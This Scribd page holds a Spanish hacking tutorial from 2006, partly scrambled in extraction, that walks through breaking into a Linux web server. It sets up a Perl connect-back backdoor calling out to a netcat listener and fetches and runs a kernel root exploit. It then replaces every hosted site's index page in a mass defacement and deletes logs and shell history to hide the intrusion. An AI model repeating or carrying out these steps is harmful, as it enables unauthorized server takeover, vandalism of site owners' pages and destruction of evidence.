P. 1
Acediendo Como R00t y Haciendo Mass Defacement

Acediendo Como R00t y Haciendo Mass Defacement

|Views: 14|Likes:
Published by dhyablo

More info:

Published by: dhyablo on Feb 28, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOC, PDF, TXT or read online from Scribd
See more
See less

02/28/2011

pdf

text

original

Acediendo Como R00t y Haciendo un Mass Defacement. *****9/10/2006****** By NitroNet - wWw.ZeroHack.

Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~INDICE~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1-# Introdución 2-# Explicación de Permisos 3-# Acomodando Backshell en el Server 4-# Poniendo a la Escucha NetCat 5-# Onteniendo Informacion del Server 7-# Dar permisos y Ejecutar el Binario (r00texploit) 8-# Haciendo el Mass Defacement 9-# Borrando log's 10-# Despedida ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~ 1-# Introdución ~~~~~~~~~~~~~~ Hola Amigos! En este tutorial les voy a explicar como conseguir acesso r00t en un server LinuX. Tambien se explicara como hacer el mass defacement, borrar logs y algun par de cosas mas. Espero ke les guste ;=) Empezemos con el asunto ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2-# Explicación de Permisos ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cuando tenemos haceso a un Server con una shell, nos fijamos que al lado de cada archivo o carpeta nos salen estas letras: (R) Lectura (W) Escritura (x) Ejecutación (d) Directorio (-) No tenemos permiso de escritura Cuando estes en netcat y pulses ls para ver los archivos y directorios ke hay, no les saldran

Ahora ya vamos a la shell y ejecutamos la dc.pl 10.. en este caso dejaremos a la escucha el puerto 9000 poniendo lo siguiente: Código: -lvvp 9000 Cuando le pongamos a la escucha deberia aparecer lo siguiente: Código: listening on [any] 9000 .. Este tuto lo guiare con la datacha0s. etc.. Weno pues hay se les kitaron las dudas.pl.251 9000 Nos Saldra lo siguiente en nuestra shell si se conecta a nuestro PC. Spawning Shell Datached . sino tambien la fecha que se subio.es/teamzer0/backdoors/dc. le añadimos -la Ejemplo: Código: ls -la Y a la izquierda del todo les saldran hay los permisos No solo les saldran los permisos.lycos. Data Cha0s Connect Back Backdoor Código: [*] [*] [*] [*] Dumping Arguments Connecting. La subiremos en el directorio /tmp/ que es un directorio donde se guardan archivos temporales y en un 99% de los servers tendremos permisos de escritura Para ir al directorio /tmp/ y subir la backshell ejecutaremos lo siguiente: Código: cd /tmp/. en vez de solo poner ls..wget usuarios.0.pl TUIP PUERTOaLAescuchaENnetcat Ejemplo: Código: perl dc..1.pl para conectarnos a nuestro PC de la siguiente manera: Código: perl dc. dejamos el netcat en nuestro PC a la escucha..los permisos que tene cada carpeta para verlos.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 4-# Poniendo a la Escucha NetCat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Una vez subida la dc. ya saben lo que significa cada letra ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3-# Acomodando Backshell en el Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ahora subimos una backshell como la datach0s o la in que son backshells en perl. hora.

uname -a Significado de cada Comando: id: Te dice en el Directorio que estas uname -a: Informacion del Sistema Al ejecutar eso les deberia salir algo parecido a esto: Código: /tmp Linux server.lycos.com 2. Parecido a esto: Código: connect to [81.9] from euirc.milw0rm.225.gr [66. ya que ahora aremos todo ejecutando comandos desde la shell ke tenemos en netcat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 5-# Onteniendo Informacion del Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ponemos en el netcat: Código: pwd.230.4.20-021stab028. escritura.74.20) podemos ir a www.24.4.248] 57566 Hay ya tamos conectados al server desde nuestro PC Weno ahora la php shell con lo ke subimos la dc y nos conectamos ya la podemos cerrar./binario . Le subimos al server de esta manera: wget usuarios.corpoweb.777-enterprise #1 SMP Fri Jan 6 9:39:27 MSK 2006 i686 athlon i386 GNU/Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 7-# Dar permisos y Ejecutar el Binario (r00texploit) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Weno una vez que ya sabemos el kernel (2.es/teamzer0/rootexploits/uselib24 Cuando este subido le damos permisos 777 (Lectura. ejecutacion) de esta forma: Código: chmod -c 777 uselib24 Y una vez que se le de permisos 777 nos saldra un mensaje como este: Código: mode of `uselib24' changed to 0777 (rwxrwxrwx) Ahora para ejecutar los binarios lo hacemos de esta forma: .47.com y buscar su r00texploit.Ahora nos fijamos en netcat y nos aparecera ke nos hemos conectado. En este caso utilizaremos el r00texploit "uselib24" Pero casi todos los binarios se utilizan igual de como realizaremos.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 8-# Haciendo el Mass Defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Weno ya que somos r00t y es nuestro el server xD vamos a dejar a las webs que aloja un index xD. ya que habeces suele tardar bastante en cargar y muchas veces dosea el server y cuando vuelve a funcar el server eres r00t :P La mayoria de los r00texploits no suelen tardar tanto y no suelen salir asi texto como salia en este. le ejecutas. map_base=0xbf800000 # vmalloc area 0xdf000000 .2523(psaserv) Y BIEN SOMOS ROOT AMIGOS!!! Ahora mandamos nosotros en el server xD A la hora de ejecutar el uselib24 tengan calma. le subimos a un server nuestro y despues lo subimos a /tmp/ da igual donde lo suban. # race won maps=23890 expanded VMA (0xbfffc000-0xffffe000) [!] try to exploit 0xe0166000 # gate modified ( 0xffec958b 0x0804ec00 ) # exploited..0xfdea2000 Wait. uid=0 Ahora ponemos id y: Código: uid=0(root) gid=0(root) groups=48(apache).Hacemos nuestro index.En este momento: . ya ken son root xD Lo subimos asi: Código: wget urldenuestraweb.conf Una vez que nos busque el archivo nos saldra en pantalla su directorio.Buscamos las webs alojadas con este comando: Código: find / -name httpd. es recomendable esperar por lo menos 1 minuto despues pulsas id y con suerte eres r00t.html O tambien pueden coger otra vez la phpShell. ahora para ver lo ke hay dentro utilizaremos el comando cat. Ejemplo: .com/index. task_size=0xc0000000. En los demas le das permisos../uselib24 Y no mas ejecutarle nos saldra esto: Código: # SLAB cleanup child 1 VMAs 15599 # moved stack bfffe000. 1º. van a tmp y lo suben 2º.

conf Hay nos saldran las webs alojadas en el server y tambien mucha info que no nos interesa.*" -exec cp /tmp/index.Ahora buscaremos todos los index.conf Le ponemos el comando cat asi: Código: cat /home/tx15/httpd. Aqui dejenlo buen rato si hay varias webs y vayan a tomarse algo Una vez que este esto.txt 3º. tb pueden buscar las carpetas /www/ y /sites/ en el server.si el httpd.lycos.pl O tambien la pueden subir desde la phpShell con el Uploader. Una vez subida la damos permisos 777 Ya saben: Código: chmod -c 777 log.conf esta en el directorio: Código: /home/tx15/httpd.lycos. ponemos: Código: cat /home/tx15/httpd.pl Nos tirara esto si le da permisos 777: Código: mode of `log.es/teamzer0/log.html {} \. esas muchas veces tambien suelen traer hay las webs Weno como ya tenemos los dominios.* en /home/ (Si saben que estan las webs alojadas en otro directorio lo cambian y listo) y ke les sustituya por el index nuestro que tenemos subido en /tmp/.conf|grep ServerName Hay les saldran los dominios Sino encuentran el archivo ese. Hay hemos puesto que busque los index.es/teamzer0/log. asi que para sacar solo las webs.pl . ya deberian en las webs nuestro index ~~~~~~~~~~~~~~~~~~~ 8-# Borrando Log's ~~~~~~~~~~~~~~~~~~~ Bien ahora borraremos las huellas jeje Weno para borrar los logs utilizaremos esta tool: http://usuarios.pl La subimos asi: Código: wget usuarios.pl' changed to 0777 (rwxrwxrwx) Ahora le ejecutamos de la siguiente manera: Código: perl log.* del server y los sustituiremos por el nuestro con este comando: Código: find /home/ -name "index. les guardamos en nuestro PC en un .

rm . pero kederaba bien Si no se fian de la tool tambien puden ejecutar los siguientes comandos: Este buscar todos los archivos con terminación . Escrito por: NitroNet E-Mail: n1tr0n3t@gmail. cualquier cosa. algo que deberia cambiar. reseteamos el archivo que guarda el Historial: unset HISTFILE ~~~~~~~~~~~~~~~ 10-# Despedida ~~~~~~~~~~~~~~~ Weno aqui ya acaba el tutorial. todavia no le posteare ni le sacare de aqui de momento :rolleyes:: Espero ke le comenten que tal les parecio.bash_history cd /. espero que muchos aprendan con este tutorial y que algunos resuelvan algunas dudas que tenian en la cabeza Cualquier duda que tengan o comentarios envienlo a mi correo y lo antes posible intentare resolversela. La tool puede ke tarde un poco en buscarles y borrarles. algun error.rm .log y te los borra: Código: find / -name "*.Se ejecutara la tool y empezara a buscar logs y archivos que registran lo que izimos. . Despues borramos los archivos bash_history y bash_logout: Código: cd /.com Weno este tuto le acabo de hacer hoy.bash_logut Si no os encuentra ninguno de esos archivos.log" -exec rm -rf {} \.

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->